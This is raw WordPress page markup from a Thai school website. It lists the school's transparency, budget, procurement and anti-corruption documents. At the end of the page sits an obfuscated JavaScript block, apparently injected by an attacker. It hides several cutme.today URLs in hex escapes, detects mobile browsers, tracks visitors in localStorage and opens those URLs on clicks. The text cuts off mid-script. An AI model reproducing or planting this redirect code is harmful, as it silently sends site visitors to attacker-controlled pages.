\"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"cda4f9-0b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tabcda4f9-0b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a>และอำนาจหน้าที่</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_921bc2-5c\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469↗\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_77fcfe-f3\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_e9af1d-e0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"e71bc9-b1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tabe71bc9-b1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_8bd340-cd\",\"color\":\"#0693e3\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_8bd340-cd kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_eb7e47-e1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb7e47-e1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cdf90d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cdf90d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_da22bc-41\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_da22bc-41\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_006068-f2\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_006068-f2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลเชิงสถิติการให้บริการ</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b2d0c3-79\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b2d0c3-79\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"bab0c3-88\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tabbab0c3-88\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_948636-84\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_948636-84 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_3edff3-bb\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_3edff3-bb\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9ab5d8-54\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9ab5d8-54\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"942a96-06\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab942a96-06\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_37f8e2-2d\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_37f8e2-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_12bed0-a6\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_12bed0-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_7e4f7d-a0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_7e4f7d-a0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"42916d-7b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab42916d-7b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_25468b-f6\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_25468b-f6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_ae038f-10\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_ae038f-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_667e50-fd\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_667e50-fd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"357ff8-b0\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab357ff8-b0\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_363bba-05\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_363bba-05 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_c0e085-63\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_c0e085-63\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_29fead-8e\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_29fead-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"77d9b7-d1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab77d9b7-d1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_c6c267-89\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_c6c267-89 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_64d6b5-67\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_64d6b5-67\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_106c4d-48\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_106c4d-48\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const 